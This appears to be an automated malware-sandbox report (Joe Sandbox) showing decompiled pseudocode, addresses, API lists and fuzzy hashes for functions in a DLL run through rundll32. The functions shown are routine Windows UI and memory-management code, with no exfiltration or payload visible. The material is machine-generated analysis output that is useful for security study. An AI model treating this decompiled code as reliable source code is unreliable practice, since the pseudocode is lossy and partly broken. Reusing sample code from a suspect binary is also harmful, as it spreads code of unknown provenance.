                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001be6c
                                                                                                            0x1001be6f
                                                                                                            0x1001be71
                                                                                                            0x1001be74
                                                                                                            0x1001be74
                                                                                                            0x00000000
                                                                                                            0x1001be74
                                                                                                            0x00000000
                                                                                                            0x1001be6f
                                                                                                            0x1001be79
                                                                                                            0x1001be7b
                                                                                                            0x1001be7d
                                                                                                            0x1001be7e
                                                                                                            0x1001be7e
                                                                                                            0x1001be7e
                                                                                                            0x1001be81
                                                                                                            0x1001be81
                                                                                                            0x1001be83
                                                                                                            0x1001be85
                                                                                                            0x1001be85
                                                                                                            0x1001be87
                                                                                                            0x1001be8d
                                                                                                            0x00000000
                                                                                                            0x1001be8d
                                                                                                            0x1001bda7
                                                                                                            0x1001bdaa
                                                                                                            0x1001bdac
                                                                                                            0x1001bdae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001bdae
                                                                                                            0x1001bcc2
                                                                                                            0x1001bcc9
                                                                                                            0x1001bcce
                                                                                                            0x1001bcdc
                                                                                                            0x00000000
                                                                                                            0x1001bcde
                                                                                                            0x1001bcde
                                                                                                            0x00000000
                                                                                                            0x1001bcde
                                                                                                            0x1001bce5
                                                                                                            0x1001bce5
                                                                                                            0x1001bce5
                                                                                                            0x1001bce8
                                                                                                            0x1001bcff
                                                                                                            0x1001bcff
                                                                                                            0x1001bd01
                                                                                                            0x00000000
                                                                                                            0x1001bd03
                                                                                                            0x1001bd03
                                                                                                            0x1001bd07
                                                                                                            0x00000000
                                                                                                            0x1001bd09
                                                                                                            0x1001bd09
                                                                                                            0x00000000
                                                                                                            0x1001bd09
                                                                                                            0x1001bd07
                                                                                                            0x1001bcea
                                                                                                            0x1001bcea
                                                                                                            0x1001bcf0
                                                                                                            0x00000000
                                                                                                            0x1001bcf2
                                                                                                            0x1001bcf2
                                                                                                            0x1001bcf6
                                                                                                            0x1001bd26
                                                                                                            0x1001bd26
                                                                                                            0x1001bd2b
                                                                                                            0x1001bd2e
                                                                                                            0x1001bd2f
                                                                                                            0x1001bd34
                                                                                                            0x1001bcf8
                                                                                                            0x1001bcf8
                                                                                                            0x1001bd0e
                                                                                                            0x1001bd11
                                                                                                            0x1001bd12
                                                                                                            0x1001bd17
                                                                                                            0x1001bd17
                                                                                                            0x1001bcf6
                                                                                                            0x1001bcf0
                                                                                                            0x1001bce8
                                                                                                            0x1001bd1b
                                                                                                            0x1001be92
                                                                                                            0x1001be92
                                                                                                            0x1001be92
                                                                                                            0x1001bdb0
                                                                                                            0x1001bdb0
                                                                                                            0x1001bdb0
                                                                                                            0x1001beb3
                                                                                                            0x1001beb3
                                                                                                            0x1001beb9
                                                                                                            0x1001bebd
                                                                                                            0x1001bec1
                                                                                                            0x1001bec5
                                                                                                            0x1001bec5
                                                                                                            0x1001bea1

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ___shr_12
                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                                                            • API String ID: 2664560246-4131533671
                                                                                                            • Opcode ID: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                                                            • Instruction ID: 0f4b10661b4c6afdc81634f06d58437e80c3cbb5605fe3a4bfa1b348def2c0f3
                                                                                                            • Opcode Fuzzy Hash: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                                                            • Instruction Fuzzy Hash: 47810232804A9ACECF01CB68C8847EEBBF4EF15354F0545AAE850DF282E774D685C3A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002DA8D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 174COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 29%
                                                                                                            			E1002DA8D(intOrPtr __ecx, void* __edx) {
				void* __esi;
				void* __ebp;
				intOrPtr _t60;
				signed char _t65;
				signed int _t70;
				signed int _t71;
				intOrPtr _t109;
				signed int _t115;
				signed int _t117;
				void* _t133;
				void* _t135;
				intOrPtr _t140;
				void* _t143;
				void* _t145;

				_t133 = __edx;
				_t143 = _t145 - 0xa8;
				_t60 =  *0x1004c470; // 0x6edecb8c
				_t140 =  *((intOrPtr*)(_t143 + 0xb0));
				 *((intOrPtr*)(_t143 + 0xa4)) = _t60;
				_t109 = __ecx;
				_t62 = GetWindowRect( *(_t140 + 0x1c), _t143 - 0x80);
				if( *((intOrPtr*)(_t140 + 0x88)) != _t109 ||  *(_t143 + 0xb4) != 0 && EqualRect(_t143 - 0x80,  *(_t143 + 0xb4)) == 0) {
					if( *((intOrPtr*)(_t109 + 0x90)) != 0 && ( *(_t140 + 0x80) & 0x00000040) != 0) {
						 *(_t109 + 0x7c) =  *(_t109 + 0x7c) | 0x00000040;
					}
					 *(_t109 + 0x7c) =  *(_t109 + 0x7c) & 0xfffffff9;
					_t65 =  *(_t140 + 0x7c) & 0x00000006 |  *(_t109 + 0x7c);
					 *(_t109 + 0x7c) = _t65;
					if((_t65 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t143 - 0x60);
						E1002095F(_t140);
						E10029B23(_t140,  *((intOrPtr*)(_t109 + 0x1c)), _t143 - 0x60);
					}
					_t70 = ( *(_t140 + 0x7c) ^  *(_t109 + 0x7c)) & 0x0000f000 ^  *(_t140 + 0x7c) | 0x00000f00;
					if( *((intOrPtr*)(_t109 + 0x90)) == 0) {
						_t71 = _t70 & 0xfffffffe;
					} else {
						_t71 = _t70 | 0x00000001;
					}
					E100383D0(_t140, _t71);
					_push(0xffffffff);
					_t135 = E1002CDCE(_t109, GetDlgCtrlID( *(_t140 + 0x1c)) & 0x0000ffff);
					if(_t135 > 0) {
						 *((intOrPtr*)(E100086F2(_t109 + 0x94, _t135))) = _t140;
					}
					if( *(_t143 + 0xb4) == 0) {
						if(_t135 < 1) {
							_t137 = _t109 + 0x94;
							E1001E2BE(_t109 + 0x94, _t143,  *((intOrPtr*)(_t109 + 0x9c)), _t140);
							E1001E2BE(_t137, _t143,  *((intOrPtr*)(_t137 + 8)), 0);
						}
						_t115 =  *0x1004efa4; // 0x2
						_push(0x115);
						_push(0);
						_push(0);
						_push( ~_t115);
						_t117 =  *0x1004efa0; // 0x2
						_push( ~_t117);
						_push(0);
					} else {
						CopyRect(_t143 - 0x70,  *(_t143 + 0xb4));
						E10028E5A(_t109, _t143 - 0x70);
						if(_t135 < 1) {
							asm("cdq");
							asm("cdq");
							_push(( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)) - _t133 >> 1) +  *((intOrPtr*)(_t143 - 0x6c)));
							_push(( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70) - _t133 >> 1) +  *(_t143 - 0x70));
							_push( *((intOrPtr*)(_t143 + 0xb0)));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E1002CE2A(_t109);
							_t140 =  *((intOrPtr*)(_t143 + 0xb0));
						}
						_push(0x114);
						_push( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)));
						_push( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70));
						_push( *((intOrPtr*)(_t143 - 0x6c)));
						_push( *(_t143 - 0x70));
						_push(0);
					}
					E100204FE(_t140);
					if(E100220EE(_t143, GetParent( *(_t140 + 0x1c))) != _t109) {
						E1000870E(_t140, _t109);
					}
					_t120 =  *((intOrPtr*)(_t140 + 0x88));
					if( *((intOrPtr*)(_t140 + 0x88)) != 0) {
						E1002D1B2(_t120, _t140, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t140 + 0x88)) = _t109;
					 *(E100314D8(_t109) + 0xcc) =  *(_t62 + 0xcc) | 0x0000000c;
				}
				return E100117AE(_t62,  *((intOrPtr*)(_t143 + 0xa4)));
			}

















                                                                                                            0x1002da8d
                                                                                                            0x1002da8e
                                                                                                            0x1002da9b
                                                                                                            0x1002daa2
                                                                                                            0x1002daa8
                                                                                                            0x1002dab6
                                                                                                            0x1002dab8
                                                                                                            0x1002dac4
                                                                                                            0x1002daf2
                                                                                                            0x1002dafd
                                                                                                            0x1002dafd
                                                                                                            0x1002db01
                                                                                                            0x1002db0e
                                                                                                            0x1002db12
                                                                                                            0x1002db15
                                                                                                            0x1002db17
                                                                                                            0x1002db1f
                                                                                                            0x1002db22
                                                                                                            0x1002db2e
                                                                                                            0x1002db2e
                                                                                                            0x1002db41
                                                                                                            0x1002db4d
                                                                                                            0x1002db54
                                                                                                            0x1002db4f
                                                                                                            0x1002db4f
                                                                                                            0x1002db4f
                                                                                                            0x1002db5a
                                                                                                            0x1002db5f
                                                                                                            0x1002db75
                                                                                                            0x1002db79
                                                                                                            0x1002db87
                                                                                                            0x1002db87
                                                                                                            0x1002db90
                                                                                                            0x1002dc11
                                                                                                            0x1002dc13
                                                                                                            0x1002dc1f
                                                                                                            0x1002dc2b
                                                                                                            0x1002dc2b
                                                                                                            0x1002dc30
                                                                                                            0x1002dc36
                                                                                                            0x1002dc3d
                                                                                                            0x1002dc3e
                                                                                                            0x1002dc41
                                                                                                            0x1002dc42
                                                                                                            0x1002dc4a
                                                                                                            0x1002dc4b
                                                                                                            0x1002db92
                                                                                                            0x1002db9c
                                                                                                            0x1002dba8
                                                                                                            0x1002dbb0
                                                                                                            0x1002dbbb
                                                                                                            0x1002dbcb
                                                                                                            0x1002dbd3
                                                                                                            0x1002dbd4
                                                                                                            0x1002dbda
                                                                                                            0x1002dbe0
                                                                                                            0x1002dbe1
                                                                                                            0x1002dbe2
                                                                                                            0x1002dbe5
                                                                                                            0x1002dbe6
                                                                                                            0x1002dbeb
                                                                                                            0x1002dbeb
                                                                                                            0x1002dbf7
                                                                                                            0x1002dbfc
                                                                                                            0x1002dc03
                                                                                                            0x1002dc04
                                                                                                            0x1002dc07
                                                                                                            0x1002dc0a
                                                                                                            0x1002dc0a
                                                                                                            0x1002dc4e
                                                                                                            0x1002dc64
                                                                                                            0x1002dc69
                                                                                                            0x1002dc69
                                                                                                            0x1002dc6e
                                                                                                            0x1002dc76
                                                                                                            0x1002dc7d
                                                                                                            0x1002dc7d
                                                                                                            0x1002dc84
                                                                                                            0x1002dc8f
                                                                                                            0x1002dc8f
                                                                                                            0x1002dcab

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$CopyCtrlEqualParentWindow
                                                                                                            • String ID: @
                                                                                                            • API String ID: 2544134605-2766056989
                                                                                                            • Opcode ID: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                                                            • Instruction ID: b45b6ef3e14a7e4d87b63386d5d067ae84193d18a4a25c559dd4ceadf4ed8576
                                                                                                            • Opcode Fuzzy Hash: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                                                            • Instruction Fuzzy Hash: E651BA716006499FDF25DF68DC95BAE77AAFF44300F504529E91ADB1A2CB30AD05CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10021B92 Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10021B92(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				struct HWND__* _t42;
				signed int _t45;
				int _t53;
				long _t56;
				int _t62;
				intOrPtr* _t69;

				_t62 = 1;
				_t69 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E100202AB(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t69 + 0x1c));
				 *(_t69 + 0x38) =  *(_t69 + 0x38) | 0x00000018;
				_v4 = _t42;
				_v8 = E1001F7B7();
				L14:
				while(1) {
					L14:
					while(_v12 != 0) {
						if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
							while(1) {
								L15:
								_t45 = E1001FABB();
								if(_t45 == 0) {
									break;
								}
								if(_t62 != 0) {
									_t53 = _v8->message;
									if(_t53 == 0x118 || _t53 == 0x104) {
										E100203AD(_t69, 1);
										UpdateWindow( *(_t69 + 0x1c));
										_t62 = 0;
									}
								}
								if( *((intOrPtr*)( *_t69 + 0x80))() == 0) {
									 *(_t69 + 0x38) =  *(_t69 + 0x38) & 0xffffffe7;
									return  *((intOrPtr*)(_t69 + 0x40));
								} else {
									if(E1001FA27(_v8) != 0) {
										_v12 = 1;
										_v16 = 0;
									}
									if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
										continue;
									} else {
										goto L14;
									}
								}
							}
							_push(0);
							E1003A098();
							return _t45 | 0xffffffff;
						}
						if(_t62 != 0) {
							E100203AD(_t69, 1);
							UpdateWindow( *(_t69 + 0x1c));
							_t62 = 0;
						}
						if((_a4 & 0x00000001) == 0 && _v4 != 0 && _v16 == 0) {
							SendMessageA(_v4, 0x121, 0,  *(_t69 + 0x1c));
						}
						if((_a4 & 0x00000002) != 0) {
							L13:
							_v12 = 0;
							continue;
						} else {
							_t56 = SendMessageA( *(_t69 + 0x1c), 0x36a, 0, _v16);
							_v16 = _v16 + 1;
							if(_t56 != 0) {
								continue;
							}
							goto L13;
						}
					}
					goto L15;
				}
			}













                                                                                                            0x10021b9b
                                                                                                            0x10021ba3
                                                                                                            0x10021ba5
                                                                                                            0x10021ba9
                                                                                                            0x10021bad
                                                                                                            0x10021bbb
                                                                                                            0x10021bbb
                                                                                                            0x10021bc0
                                                                                                            0x10021bc6
                                                                                                            0x10021bca
                                                                                                            0x10021bd9
                                                                                                            0x00000000
                                                                                                            0x10021c51
                                                                                                            0x00000000
                                                                                                            0x10021c51
                                                                                                            0x10021bef
                                                                                                            0x10021c57
                                                                                                            0x10021c57
                                                                                                            0x10021c57
                                                                                                            0x10021c5e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021c62
                                                                                                            0x10021c68
                                                                                                            0x10021c70
                                                                                                            0x10021c7d
                                                                                                            0x10021c85
                                                                                                            0x10021c87
                                                                                                            0x10021c87
                                                                                                            0x10021c70
                                                                                                            0x10021c95
                                                                                                            0x10021cd0
                                                                                                            0x00000000
                                                                                                            0x10021c97
                                                                                                            0x10021ca3
                                                                                                            0x10021ca5
                                                                                                            0x10021cad
                                                                                                            0x10021cad
                                                                                                            0x10021cc1
                                                                                                            0x00000000
                                                                                                            0x10021cc3
                                                                                                            0x00000000
                                                                                                            0x10021cc3
                                                                                                            0x10021cc1
                                                                                                            0x10021c95
                                                                                                            0x10021cc5
                                                                                                            0x10021cc6
                                                                                                            0x00000000
                                                                                                            0x10021ccb
                                                                                                            0x10021bf3
                                                                                                            0x10021bf9
                                                                                                            0x10021c01
                                                                                                            0x10021c03
                                                                                                            0x10021c03
                                                                                                            0x10021c0a
                                                                                                            0x10021c25
                                                                                                            0x10021c25
                                                                                                            0x10021c30
                                                                                                            0x10021c4d
                                                                                                            0x10021c4d
                                                                                                            0x00000000
                                                                                                            0x10021c32
                                                                                                            0x10021c3f
                                                                                                            0x10021c45
                                                                                                            0x10021c4b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021c4b
                                                                                                            0x10021c30
                                                                                                            0x00000000
                                                                                                            0x10021c51

                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 10021BC0
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10021BE7
                                                                                                            • UpdateWindow.USER32(?), ref: 10021C01
                                                                                                            • SendMessageA.USER32(?,00000121,00000000,?), ref: 10021C25
                                                                                                            • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 10021C3F
                                                                                                            • UpdateWindow.USER32(?), ref: 10021C85
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10021CB9
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                            • String ID:
                                                                                                            • API String ID: 2853195852-0
                                                                                                            • Opcode ID: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
                                                                                                            • Instruction ID: 572a0072a054787b928fb31f1bd515718dba8d5f307fe0ba771f0ec6dbe0ec5d
                                                                                                            • Opcode Fuzzy Hash: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
                                                                                                            • Instruction Fuzzy Hash: AC41D4382047419FD722CF22AC88E5BBAF5FFD1794FA0092DF881951A1D732E945CB52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000943B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114comstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E1000943B(void* __ecx) {
				intOrPtr _t54;
				intOrPtr _t56;
				signed int _t72;
				signed int _t74;
				signed int _t79;
				void* _t81;
				void* _t85;
				void* _t100;
				void* _t101;
				void* _t103;
				signed int _t106;
				intOrPtr* _t107;
				void* _t109;
				void* _t111;
				void* _t112;

				E10011BF0(0x1003add7, _t109);
				_t112 = _t111 - 0x80;
				_t54 =  *0x1004c470; // 0x6edecb8c
				 *((intOrPtr*)(_t109 - 0x10)) = _t54;
				_t101 = __ecx;
				 *((intOrPtr*)(_t109 - 0x58)) =  *0x1004b0a0(_t100, _t103, _t85);
				 *((intOrPtr*)(_t109 - 0x50)) = 0;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x10040430;
				_t56 =  *((intOrPtr*)(_t109 + 8));
				 *(_t109 - 4) = 0;
				if(_t56 == 0 ||  *(_t56 + 4) == 0) {
					if(E100090AB(_t109 - 0x54, 0x11) != 0 || E100090AB(_t109 - 0x54, 0xd) != 0) {
						_t56 = _t109 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t101 + 0x60)) = 0;
					}
				} else {
					L6:
					_t13 = _t56 + 4; // 0x10009a67
					GetObjectA( *_t13, 0x3c, _t109 - 0x4c);
					 *(_t109 - 0x78) = 0x20;
					_t105 = lstrlenA(_t109 - 0x30) + 1;
					E10010B20(lstrlenA(_t109 - 0x30) + 0x00000001 + lstrlenA(_t109 - 0x30) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109 - 0x4c);
					 *((intOrPtr*)(_t109 - 0x74)) = E100067FA(_t112, _t109 - 0x30, _t105,  *((intOrPtr*)(_t109 - 0x58)));
					 *((short*)(_t109 - 0x68)) =  *((intOrPtr*)(_t109 - 0x3c));
					 *(_t109 - 0x66) =  *(_t109 - 0x35) & 0x000000ff;
					 *(_t109 - 0x64) =  *(_t109 - 0x38) & 0x000000ff;
					 *(_t109 - 0x60) =  *(_t109 - 0x37) & 0x000000ff;
					 *(_t109 - 0x5c) =  *(_t109 - 0x36) & 0x000000ff;
					_t72 =  *(_t109 - 0x4c);
					__eflags = _t72;
					_t106 = _t72;
					if(_t72 < 0) {
						_t106 =  ~_t72;
					}
					E10029194(_t109 - 0x8c);
					 *(_t109 - 4) = 1;
					_t74 = GetDeviceCaps( *(_t109 - 0x84), 0x5a);
					asm("cdq");
					_t107 = _t101 + 0x60;
					 *((intOrPtr*)(_t109 - 0x6c)) = 0;
					 *(_t109 - 0x70) = _t106 * 0xafc80 / _t74;
					E1003881B(_t107);
					_t79 = _t109 - 0x78;
					__imp__#420(_t79, 0x10043168, _t107,  *((intOrPtr*)(_t101 + 0x1c)));
					__eflags = _t79;
					if(__eflags < 0) {
						 *_t107 = 0;
					}
					 *(_t109 - 4) = 0;
					E100291EF(_t109 - 0x8c, __eflags);
				}
				 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x1003eb6c;
				_t81 = E100293B4(_t109 - 0x54);
				 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
				return E100117AE(_t81,  *((intOrPtr*)(_t109 - 0x10)));
			}


















                                                                                                            0x10009440
                                                                                                            0x10009445
                                                                                                            0x1000944b
                                                                                                            0x10009453
                                                                                                            0x10009456
                                                                                                            0x10009460
                                                                                                            0x10009463
                                                                                                            0x10009466
                                                                                                            0x1000946d
                                                                                                            0x10009472
                                                                                                            0x10009475
                                                                                                            0x10009488
                                                                                                            0x100094a0
                                                                                                            0x00000000
                                                                                                            0x10009498
                                                                                                            0x10009498
                                                                                                            0x10009498
                                                                                                            0x100094a3
                                                                                                            0x100094a3
                                                                                                            0x100094a9
                                                                                                            0x100094ac
                                                                                                            0x100094b6
                                                                                                            0x100094c5
                                                                                                            0x100094cf
                                                                                                            0x100094e4
                                                                                                            0x100094eb
                                                                                                            0x100094f4
                                                                                                            0x100094fc
                                                                                                            0x10009503
                                                                                                            0x1000950a
                                                                                                            0x1000950d
                                                                                                            0x10009510
                                                                                                            0x10009512
                                                                                                            0x10009514
                                                                                                            0x10009518
                                                                                                            0x10009518
                                                                                                            0x10009523
                                                                                                            0x10009530
                                                                                                            0x10009534
                                                                                                            0x10009544
                                                                                                            0x10009547
                                                                                                            0x1000954b
                                                                                                            0x1000954e
                                                                                                            0x10009551
                                                                                                            0x1000955c
                                                                                                            0x10009560
                                                                                                            0x10009566
                                                                                                            0x10009568
                                                                                                            0x1000956a
                                                                                                            0x1000956a
                                                                                                            0x10009572
                                                                                                            0x10009575
                                                                                                            0x10009575
                                                                                                            0x1000957a
                                                                                                            0x10009581
                                                                                                            0x10009588
                                                                                                            0x10009596
                                                                                                            0x100095a9

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10009440
                                                                                                            • GetObjectA.GDI32(10009A67,0000003C,?), ref: 100094AC
                                                                                                            • lstrlenA.KERNEL32(?), ref: 100094BD
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10009534
                                                                                                            • OleCreateFontIndirect.OLEAUT32(00000020,10043168,?), ref: 10009560
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4082312370-3916222277
                                                                                                            • Opcode ID: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
                                                                                                            • Instruction ID: 94df4567bccff522b7d7bd0d545f1ce16673c33dc0c382d35917ea97f1dbbf88
                                                                                                            • Opcode Fuzzy Hash: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
                                                                                                            • Instruction Fuzzy Hash: C641BA75D01259AFEB10CFE5C885ADDBBB4FF09344F50802AE856EB292E7349A04CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10037732 Relevance: 10.6, APIs: 7, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10037732(long* __ecx, signed int _a4, intOrPtr _a8) {
				struct _CRITICAL_SECTION* _v8;
				void* __ebp;
				void* _t32;
				void* _t36;
				void* _t37;
				signed int _t52;
				long* _t59;
				struct _CRITICAL_SECTION* _t62;
				void* _t64;

				_push(__ecx);
				_t59 = __ecx;
				_t1 =  &(_t59[7]); // 0x1004f010
				_t62 = _t1;
				_v8 = _t62;
				EnterCriticalSection(_t62);
				_t32 = _a4;
				if(_t32 <= 0) {
					L20:
					LeaveCriticalSection(_t62);
				} else {
					_t4 =  &(_t59[3]); // 0x3
					if(_t32 >=  *_t4) {
						goto L20;
					} else {
						_t64 = TlsGetValue( *_t59);
						if(_t64 == 0) {
							if(E1003741E(0x10) == 0) {
								_t64 = 0;
							} else {
								_t64 = E10037684(_t34);
							}
							 *(_t64 + 8) = 0;
							 *(_t64 + 0xc) = 0;
							_t10 =  &(_t59[5]); // 0x30f0ba0
							_t49 =  *_t10;
							_t11 =  &(_t59[6]); // 0x4
							 *(_t64 +  *_t11) =  *_t10;
							_t59[5] = _t64;
							goto L10;
						} else {
							_t52 = _a4;
							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
								L10:
								_t36 =  *(_t64 + 0xc);
								if(_t36 != 0) {
									_t16 =  &(_t59[3]); // 0x3
									_t49 =  *_t16 << 2;
									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
								} else {
									_t15 =  &(_t59[3]); // 0x3
									_t37 = LocalAlloc(0,  *_t15 << 2);
								}
								if(_t37 == 0) {
									LeaveCriticalSection(_v8);
									_t37 = E1001CE3B(_t49);
								}
								 *(_t64 + 0xc) = _t37;
								_t20 =  &(_t59[3]); // 0x3
								E10011C50(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
								_t23 =  &(_t59[3]); // 0x3
								 *(_t64 + 8) =  *_t23;
								TlsSetValue( *_t59, _t64);
								_t52 = _a4;
							}
						}
						_t32 =  *(_t64 + 0xc);
						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
						}
						LeaveCriticalSection(_v8);
					}
				}
				return _t32;
			}












                                                                                                            0x10037735
                                                                                                            0x10037739
                                                                                                            0x1003773b
                                                                                                            0x1003773b
                                                                                                            0x1003773f
                                                                                                            0x10037742
                                                                                                            0x10037748
                                                                                                            0x1003774f
                                                                                                            0x1003782b
                                                                                                            0x1003782c
                                                                                                            0x10037755
                                                                                                            0x10037755
                                                                                                            0x10037758
                                                                                                            0x00000000
                                                                                                            0x1003775e
                                                                                                            0x10037766
                                                                                                            0x1003776a
                                                                                                            0x1003778c
                                                                                                            0x10037799
                                                                                                            0x1003778e
                                                                                                            0x10037795
                                                                                                            0x10037795
                                                                                                            0x1003779b
                                                                                                            0x1003779e
                                                                                                            0x100377a1
                                                                                                            0x100377a1
                                                                                                            0x100377a4
                                                                                                            0x100377a7
                                                                                                            0x100377aa
                                                                                                            0x00000000
                                                                                                            0x1003776c
                                                                                                            0x1003776c
                                                                                                            0x10037772
                                                                                                            0x100377ad
                                                                                                            0x100377ad
